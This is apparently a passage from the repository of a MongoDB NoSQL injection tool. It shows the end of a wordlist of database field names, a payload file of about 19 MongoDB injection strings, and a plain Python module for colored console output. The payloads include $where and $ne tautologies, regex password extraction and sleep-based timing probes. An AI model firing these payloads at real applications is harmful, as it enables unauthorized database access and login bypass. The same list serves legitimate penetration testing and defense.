allowstickthread 2353 | departmentid 2354 | allowmassprune 2355 | identify 2356 | old 2357 | avatar 2358 | allowedituser 2359 | forumname 2360 | descrip 2361 | blogid 2362 | allowmoduser 2363 | lastposterid 2364 | today 2365 | tempfidlist 2366 | feedid 2367 | courseid 2368 | olid 2369 | hk_value 2370 | xh 2371 | allowpostannounce 2372 | copy 2373 | splitstring 2374 | icon 2375 | fidlist 2376 | lastpostpmtime 2377 | article 2378 | former 2379 | projectid 2380 | avatarheight 2381 | html 2382 | alloweditpoll 2383 | downloads 2384 | channelid 2385 | allowbanuser 2386 | appid 2387 | allowcensorword 2388 | emailid 2389 | lastexecuted 2390 | decl_mail 2391 | lastupdatetime 2392 | billid 2393 | vid 2394 | lastposter 2395 | allowrefund 2396 | allowviewrealname 2397 | installed 2398 | lasttid 2399 | postcount 2400 | searchstring 2401 | reason 2402 | customstatus 2403 | titleid 2404 | newpms 2405 | verifycode 2406 | forumid 2407 | attention 2408 | readperm 2409 | skype 2410 | lastsearchtime 2411 | bio 2412 | lastpostid 2413 | postdatetime 2414 | question 2415 | poster 2416 | sightml 2417 | highlight 2418 | pageid 2419 | threadorder 2420 | todaycount 2421 | currentindex 2422 | avatarwidth 2423 | magic 2424 | allowmodpost 2425 | allowviewip 2426 | pro_id 2427 | iid 2428 | decrip 2429 | alloweditpost 2430 | mailid 2431 | lastforumposterid 2432 | accountid 2433 | tids 2434 | medals 2435 | fileid 2436 | postid 2437 | closed 2438 | lastactivity 2439 | newnotices 2440 | allowviewlog 2441 | expiration 2442 | layer 2443 | ishtml 2444 | command 2445 | brand_id 2446 | disablepostctrl 2447 | fieldname 2448 | ajar 2449 | akses 2450 | aktif 2451 | akun 2452 | alamat 2453 | batas 2454 | cabang 2455 | deskripsi 2456 | foto 2457 | harga 2458 | hp 2459 | jeda 2460 | jenis 2461 | jml 2462 | judul 2463 | kata_kunci 2464 | kata_sandi 2465 | katakunci 2466 | katasandi 2467 | kategori 2468 | kelas 2469 | keterangan 2470 | kode 2471 | kunci 2472 | lahir 2473 | nama 2474 | nama_akun 2475 | nama_pengguna 2476 | namaakun 2477 | namapengguna 2478 | pekerjaan 2479 | pendidikan 2480 | pengguna 2481 | penjelasan 2482 | perusahaan 2483 | ponsel 2484 | ruang 2485 | sandi 2486 | soal 2487 | surat_elektronik 2488 | surel 2489 | tanggal 2490 | tanggal_lahir 2491 | tempat 2492 | tempat_lahir 2493 | tmp_lahir 2494 | universitas 2495 | urut 2496 | waktu 2497 | cookie 2498 | login_count -------------------------------------------------------------------------------- /txt/mongodb_nosqli.txt: -------------------------------------------------------------------------------- 1 | true, $where: '1 == 1' 2 | , $where: '1 == 1' 3 | $where: '1 == 1' 4 | ', $where: '1 == 1 5 | 1, $where: '1 == 1' 6 | { $ne: 1 } 7 | ', $or: [ {}, { 'a':'a 8 | ' } ], $comment:'successful MongoDB injection' 9 | db.injection.insert({success:1}); 10 | db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 11 | || 1==1 12 | ' && this.password.match(/.*/)//+%00 13 | ' && this.passwordzz.match(/.*/)//+%00 14 | '%20%26%26%20this.password.match(/.*/)//+%00 15 | '%20%26%26%20this.passwordzz.match(/.*/)//+%00 16 | {$gt: ''} 17 | [$ne]=1 18 | ';sleep(5000); 19 | ';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); 20 | -------------------------------------------------------------------------------- /util/__pycache__/output.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/util/__pycache__/output.cpython-36.pyc -------------------------------------------------------------------------------- /util/__pycache__/output.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/util/__pycache__/output.cpython-38.pyc -------------------------------------------------------------------------------- /util/output.py: -------------------------------------------------------------------------------- 1 | from colorama import Fore; 2 | from colorama import Style; 3 | import colorama; 4 | 5 | verb = False; 6 | 7 | def colinit(): 8 | colorama.init(); 9 | 10 | def setVerbose(setting): 11 | global verb; 12 | verb = setting; 13 | 14 | def verbose(message): 15 | global verb; 16 | if verb: 17 | print(Style.BRIGHT+Fore.BLUE+"[v] "+message+Style.NORMAL+Fore.RESET); 18 | 19 | def plain(message): 20 | print(" " + message); 21 | 22 | def success(message): 23 | print(Style.BRIGHT+Fore.GREEN+"[+] "+message+Style.NORMAL+Fore.RESET); 24 | 25 | def yellow(message): 26 | print(Style.BRIGHT+Fore.YELLOW+message+Style.NORMAL+Fore.RESET); 27 | 28 | def bold(message): 29 | print(Fore.CYAN+"[*] "+message+Fore.RESET); 30 | 31 | def failure(message): 32 | print(Style.BRIGHT+Fore.RED+"[-] "+message+Style.NORMAL+Fore.RESET); 33 | 34 | def info(message): 35 | print(Fore.MAGENTA+"[i] "+message+Fore.RESET); 36 | 37 | 38 | def question(message): 39 | print(Fore.YELLOW,end=""); 40 | text = input("[?] "+message+" [y/N] ").lower(); 41 | print(Fore.RESET,end=""); 42 | if text == "n" or text == "no": 43 | return False; 44 | return True; 45 | 46 | --------------------------------------------------------------------------------